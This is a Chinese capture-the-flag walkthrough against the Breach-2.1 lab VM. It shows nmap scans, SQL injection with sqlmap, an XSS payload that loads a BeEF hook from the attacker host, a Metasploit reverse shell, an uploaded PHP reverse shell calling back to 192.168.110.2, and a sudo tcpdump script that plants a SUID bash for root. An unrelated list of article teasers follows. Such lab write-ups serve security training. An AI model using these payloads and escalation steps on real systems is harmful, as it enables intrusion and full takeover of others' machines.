Breach-2.1

靶场环境说明

该靶场是静态IP地址,需要更改网络配置,攻击机kali做了两张网卡;

信息收集

# nmap -sT --min-rate 10000 -p- 192.168.110.151 -oN port.nmap
Starting Nmap 7.94 ( https://nmap.org ) at 2024-02-09 10:47 CST
Stats: 0:00:18 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 74.36% done; ETC: 10:47 (0:00:02 remaining)
Nmap scan report for 192.168.110.151
Host is up (0.0013s latency).
Not shown: 65532 closed tcp ports (conn-refused)
PORT      STATE SERVICE
111/tcp   open  rpcbind
40653/tcp open  unknown
65535/tcp open  unknown
MAC Address: 00:0C:29:DA:80:1A (VMware)

Nmap done: 1 IP address (1 host up) scanned in 20.16 seconds

开放端口信息为三个,分别是111,40653,65535三个端口,111端口上是rpc,远程过程调用!

# nmap -sT -sC -sV -O -p111,40653,65535 192.168.110.151 -oN details.nmap
Starting Nmap 7.94 ( https://nmap.org ) at 2024-02-09 10:48 CST
Nmap scan report for 192.168.110.151
Host is up (0.00076s latency).

PORT      STATE SERVICE VERSION
111/tcp   open  rpcbind 2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100024  1          34417/tcp6  status
|   100024  1          40653/tcp   status
|   100024  1          45426/udp6  status
|_  100024  1          57938/udp   status
40653/tcp open  status  1 (RPC #100024)
65535/tcp open  ssh     OpenSSH 6.7p1 Debian 5+deb8u2 (protocol 2.0)
| ssh-hostkey: 
|   1024 f3:53:9a:0b:40:76:b1:02:87:3e:a5:7a:ae:85:9d:26 (DSA)
|   2048 9a:a8:db:78:4b:44:4f:fb:e5:83:6b:67:e3:ac:fb:f5 (RSA)
|   256 c1:63:f1:dc:8f:24:81:82:35:fa:88:1a:b8:73:40:24 (ECDSA)
|_  256 3b:4d:56:37:5e:c3:45:75:15:cd:85:00:4f:8b:a8:5e (ED25519)
MAC Address: 00:0C:29:DA:80:1A (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

开放端口的详细信息探测结果显示65535端口是openssh! 剩下的两个端口是rpc服务!

# nmap -sT --script=vuln -p111,40653,65535 192.168.110.151 -oN vuln.nmap
Starting Nmap 7.94 ( https://nmap.org ) at 2024-02-09 10:50 CST
Nmap scan report for 192.168.110.151
Host is up (0.00054s latency).

PORT      STATE SERVICE
111/tcp   open  rpcbind
40653/tcp open  unknown
65535/tcp open  unknown
MAC Address: 00:0C:29:DA:80:1A (VMware)

Nmap done: 1 IP address (1 host up) scanned in 23.34 seconds

默认漏洞脚本探测的结果没什么能用的!探测一下UDP端口!

# nmap -sU --min-rate 10000 -p- 192.168.110.151 -oN udp.nmap            
Starting Nmap 7.94 ( https://nmap.org ) at 2024-02-09 10:57 CST
Warning: 192.168.110.151 giving up on port because retransmission cap hit (10).
Nmap scan report for 192.168.110.151
Host is up (0.00078s latency).
Not shown: 65454 open|filtered udp ports (no-response), 78 closed udp ports (port-unreach)
PORT      STATE SERVICE
111/udp   open  rpcbind
5353/udp  open  zeroconf
57938/udp open  unknown
MAC Address: 00:0C:29:DA:80:1A (VMware)

udp端口显示开放端口同样是三个,分别是111和5353 zeroconf 以及57938端口!

寻找立足点

探测了一下rpc的服务信息:

对于RPC服务的渗透测试还是不熟悉,不知道该如何寻找立足点,之前见过2049端口上的NFS服务存在信息泄露!但是这里并没有2049端口~

这里ssh登录root的时候,看到了提示用户peter 和 密码 inthesource尝试进行登录:

但是连接关闭了~ 后面发现网站可以访问!后续再次对端口进行探测,发现了80端口:

源码中式上面的信息,看起来似乎并没有什么提示信息!利用gobuster进行目录的探测,发现了两个目录:

一个是images 另一个是blog目录!

images目录是403状态,但是访问blog目录出现了上面的信息!尝试利用之前的账号和密码信息进行登录:

但是上面拿到的凭据信息也是不对的,为了验证自己获得的这组凭据没错,利用hydra进行了测试:

路径发现了用户admin!

看到search界面,尝试利用sqlmap跑一下:

发现了两个数据库信息:

尝试读取oscommerce数据库中的信息:

读取到了一个用户admin的密码,尝试解密:

后面一直拿到什么突破点,看了大佬们的wp,用的XSS,XSS一直都是被自己忽略的getshell方式~

发现了xss的利用,需要用到beef工具!apt install beef-xss进行安装!之后启动命令为:

kali之beef的使用_kali没有beef-CSDN博客

beef-xss: 需要修改一下默认的密码!

之后正常的登陆即可!根据https://www.exploit-db.com/exploits/17640 的提示,访问目标靶机的注册页面,然后输入<script src="http://192.168.110.2:3000/hook.js"></script> 攻击代码,密码和邮箱字段随便输入提交即可

提交成功之后访问http://192.168.110.151/blog/members.html 即可触发漏洞,此时便会在beef框架上看被控制端:

然后看beef的panel!

之后再根据Redirect Browse配合metasploit拿个反弹shell:

use exploit/multi/browser/firefox_proto_crmfrequest 
set payload generic/shell_reverse_tcp
set srvhost 192.168.110.2
set uripath shell
set lhost 192.168.110.2
run

将得到的地址,放到beef中执行!

之后成功收到了会话,准备提权!但是这个会话极不稳定!需要做一下持久化处理!首先,查找 post shell to meterpreter:

search post shell to meterpreter
use 5 
set lhost 192.168.110.2
set sessions 1
run

第二个就是我们建立的持久化会话!

查看/etc/passwd文件!发现了两个用户!

查看sudo权限,发现了apache2的文件!推测前面ssh登陆不成功,寻找ssh的配置文件,于是在/etc/ssh目录下面找到了ssh的配置文件

在最下面发现了强制执行了startme,判断可能与ssh无法建立连接有关系!

于是查看这个文件,发现他启动apache服务,怪不得我们ssh连接之后,再次扫描端口信息,发现了80端口运行了!尝试覆盖掉.bashrc文件!这样就可以在ssh连接后保持shell

之后发现了网站的目录下面,还存在着html2,看到了里面oscommerce!发现了一个端口2323!

利用telnet进行连接查看,发现了回显一个经纬度,还需要我们输入用户名和密码信息,google搜索了一下这个经纬度:

发现了houston!不知道是用户名还是密码!用户名的话也就是之前我们看到了/etc/passwd文件中的用户名,可以拿来尝试下!

但是问我们订书机是什么!??

后面发现了/usr/local/bin/cd.py这个文件比较特殊,还存在stapler关键字!查看文件中的内容!

看了里面的内容,发现答案是mine!再次连接2323端口:

执行完成之后,发现了我们当前的用户已经变了,milton用户!初步的提权成功!后面看到了隐藏文件.profile:

sudo权限执行了nginx,此时再次查看端口信息,发现了8888端口!

后面查看端口上的服务,发现了:

后面尝试添加了admin路径,发现了登录的界面,因为之前我们在80端口上发现了sql注入,拿到了密码!所以尝试寻找了后台登陆界面!

利用之前的账号和密码信息,进行登录!解密的密码是32,但是一直没能成功登录,使用admin/admin登陆成功!

找到了一个文件上传的地方!但是一直没能成功的上传,后来在include目录下面找到了一个可写的目录:

这里上传了反弹shell,监听地址为192.168.110.2 5555端口,上传之后,访问http://192.168.110.151:8888/oscommerce/includes/work/php-reverse-shell.php,同时监听:

查看sudo权限!

发现了无密码以root身份执行tcpdump!

切换到 tmp 目录,构造1.sh 脚本文件以实现提权(将 /bin/bash 复制至 /tmp/shell,并添加SUID)

然后执行GTOFbins中给出的 sudo 命令,实现脚本利用

cd /tmp
echo '#!/bin/bash' >> 1.sh
echo 'cp /bin/bash /tmp/shell' >> 1.sh
echo 'chmod +s /tmp/shell' >> 1.sh
chmod +x 1.sh
sudo tcpdump -ln -i lo -w /dev/null -W 1 -G 1 -z /tmp/1.sh -Z root

tcpdump 相关命令中包含lo参数,因此需要在 milton 用户终端中构造本地流量

最后,在 /tmp中提权

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:/a/445920.html

如若内容造成侵权/违法违规/事实不符,请联系我们进行投诉反馈qq邮箱809451989@qq.com,一经查实,立即删除!

相关文章

2022年我国茶树分布数据以及数据制作过程详细介绍

茶树&#xff08;Camellia sinensis&#xff09;是一种典型的农林作物&#xff0c;在60多个国家种植&#xff0c;作为一种重要的特色经济作物&#xff0c;具有重要的经济和社会意义。准确的全国作物数据对于有效的农业管理和资源监管至关重要。然而&#xff0c;许多区域都在努力…

利用Amazon Bedrock畅玩Claude 3等多种领先模型,抢占AI高地(体验倒计时4小时)

快乐的时间总是短暂的&#xff0c;Claude 3 在亚马逊云科技上限时体验仅剩4小时&#xff0c;上次分享了入门级操作教程&#xff0c;本期给大家带来AWS Lambda Amazon Bedrock一起构建可以便捷使用的Claude 3接口 AWS Lambda AWS Lambda 是一项计算服务&#xff0c;可以运行您…

JZ76 删除链表中重复的结点

/*public class ListNode {int val;ListNode next null;ListNode(int val) {this.val val;} } */import java.util.*; public class Solution {public ListNode deleteDuplication(ListNode pHead) {//初步想想法&#xff1a; 弄一个hashmap 然后进行key存储起来。然后 如果存…

[Buuctf] [MRCTF2020] Xor

运行 1.查壳 32位exe文件&#xff0c;没有壳 2.用32位IDA打开 找到main函数&#xff0c;F5查看伪代码&#xff0c;但是这里会弹出一个窗口 函数分析失败&#xff01;&#xff01; 这里我在看别人的题解时发现一种玄学方式解决了这个问题 窗口里面弹出了一个地址401095&…

鸿蒙Harmony应用开发—ArkTS声明式开发(模态转场设置:半模态转场)

通过bindSheet属性为组件绑定半模态页面&#xff0c;在组件插入时可通过设置自定义或默认的内置高度确定半模态大小。 说明&#xff1a; 从API Version 10开始支持。后续版本如有新增内容&#xff0c;则采用上角标单独标记该内容的起始版本。 不支持路由跳转。 bindSheet bind…

【工具】Git的介绍与安装

目录 前言 1W&#xff1a;什么是Git&#xff1f; 2W&#xff1a;为什么使用Git&#xff1f; 3W&#xff1a;如何使用Git&#xff1f; Git的安装步骤 测试 3.1 桌面空白部分鼠标右击 3.2 选择 Open Git Bash here 3.3 输入 git -v 命令查看版本 Git区域分布 Git的工作…

Python列表及其操作详解,从此不再迷茫!

在前面的文章中&#xff0c;我们详细讲了六大数据类型中的数字类型&#xff0c;字符串类型。相信大家都能够熟练的掌握了。那么今天我们来讲解列表&#xff08;list&#xff09;。 这是一种常用且重要的数据类型&#xff0c;List可以用来存储一系列的元素&#xff0c;对于后期…

【漏洞复现】锐捷网络NBR700G 信息泄露

0x01 产品简介 锐捷网络NBR700G路由器是锐捷网络股份有限公司的一款无线路由设备。 0x02 漏洞概述 锐捷网络NBR700G路由器存在信息漏洞。未授权的攻击者可以通过该漏洞获取敏感信息。 0x03 测绘语句 fofa&#xff1a;body"系统负荷过高&#xff0c;导致网络拥塞&…

[LeetCode][LCR149]彩灯装饰记录 I——二叉树的层序遍历

题目 LCR 149. 彩灯装饰记录 I 给定一棵圣诞树&#xff0c;记作根节点为 root 的二叉树&#xff0c;节点值为该位置装饰彩灯的颜色编号。按照从左到右的顺序返回每一层彩灯编号。 示例 1&#xff1a; 输入&#xff1a;root [8,17,21,18,null,null,6] 输出&#xff1a;[8,17,…

【Python-Docx库】Word与Python的完美结合

今天给大家分享Python处理Word的第三方库&#xff1a;Python-Docx。 什么是Python-Docx&#xff1f; Python-Docx是用于创建和更新Microsoft Word&#xff08;.docx&#xff09;文件的Python库。 日常需要经常处理Word文档&#xff0c;用Python的免费第三方包&#xff1a;Pyt…

Vue3学习记录(六)--- 组合式API之依赖注入和异步组件

一、依赖注入 1、简介 ​ 在前面的笔记中&#xff0c;我们学习过父组件向子组件传递数据时&#xff0c;需要借助props来实现。但如果父组件想要向孙子组件传递数据&#xff0c;那就要连续使用两层props逐级向下传递&#xff0c;如果要接收数据的是更深层的后代组件&#xff0…

管理技巧 | 提升团队效能:如何与下属进行有效沟通

在日常的管理工作中&#xff0c;沟通作为一项基础而关键的技能&#xff0c;往往决定了团队的协作效率和目标达成率。作为一个曾经从基层员工一路成长为管理者的Angelia老师&#xff0c;深知沟通的艺术对于激发团队潜力的重要性。本篇文章与大家分享几个关于如何与下属进行有效沟…

Oracle Essbase 多维库导入文件数据步骤操作

第一步&#xff1a; 先确定导入数据的维度数量&#xff08;清楚自己需要导入什么数据和范围&#xff09; 第二步&#xff1a; 设置加载的规则 1.创建规则 2.编辑规则-》打开数据文件 通过数据文件来确定加载规则的加载格式 先查看数据文件格式&#xff1a; 将数据文件导入&…

MySQL执行原理、存储引擎、索引模型简介

1.sql的执行原理 Connectors 连接、支持多种协议&#xff0c;各种语言 Management service 系统管理和控制工具&#xff0c;例如&#xff1a;备份、集群副本管理等 pool 连接池 sql interfaces sql接口-接收命令返回结果 parser 分析解析器&#xff1a;验证 optimizer 优化…

板材的加强筋优化

前言 本示例使用优化模块通过引入加强筋来优化简单板的刚度。 本页讨论 前言应用描述Abaqus建模方法和仿真技术文件参考 应用描述 本示例说明了基于条件的简单支撑平板的加强筋优化。在加强筋优化过程中&#xff0c;壳单元的节点在壳法线的方向上移动&#xff0c;以增加惯性…

StableDiffusion3 官方blog论文研究

博客源地址&#xff1a;Stable Diffusion 3: Research Paper — Stability AI 论文源地址&#xff1a;https://arxiv.org/pdf/2403.03206.pdf Stability.AI 官方发布了Stable diffusion 3.0的论文研究&#xff0c;不过目前大家都沉浸在SORA带来的震撼中&#xff0c;所以这个水…

一. 并行处理与GPU体系架构-并行处理简介

目录 前言0. 简述1. 串行处理与并行处理的区别2. 并行执行3. 容易混淆的几个概念4. 常见的并行处理总结参考 前言 自动驾驶之心推出的 《CUDA与TensorRT部署实战课程》&#xff0c;链接。记录下个人学习笔记&#xff0c;仅供自己参考 本次课程我们来学习下课程第一章——并行处…

window mysql 安装出现的问题

1.安装到最后时&#xff0c;报错&#xff1a;authentication_string doesnt have a default value 解决办法&#xff1a; 1.不要关掉该页面&#xff0c;点击skip。 然后单击 back 回退到如下界面 2.去掉 Enable Strict Mode。 不要勾选 2. 最后一步&#xff1a;Start Servic…

8.5 Springboot项目实战 Redis缓存热点数据

文章目录 前言一、缓存与数据库一致性二、Repository层 -- Cache Aside模式实操BookRepositoryBookRepositoryImpl2.1 查询2.2 修改2.3 删除2.4 扩展Mapper修改三、Service层调用修改四、测试前言 前两文我们讲解了如何在SpringBoot中整合Redis,接下来我们将进行

Spring学习笔记(八)基于Spring mvc技术的简单后台登录验证系统

一、需求分析 本项目主要是对用户登录状态的验证&#xff0c;只有登录成功的用户才可以访问系统中的资源。为了保证后台系统的页面不能被客户直接请求访问&#xff0c;本案例中所有的页面都存放在项目的WEB-INF 文件夹下&#xff0c;客户需要访问相关页面时&#xff0c;需要在…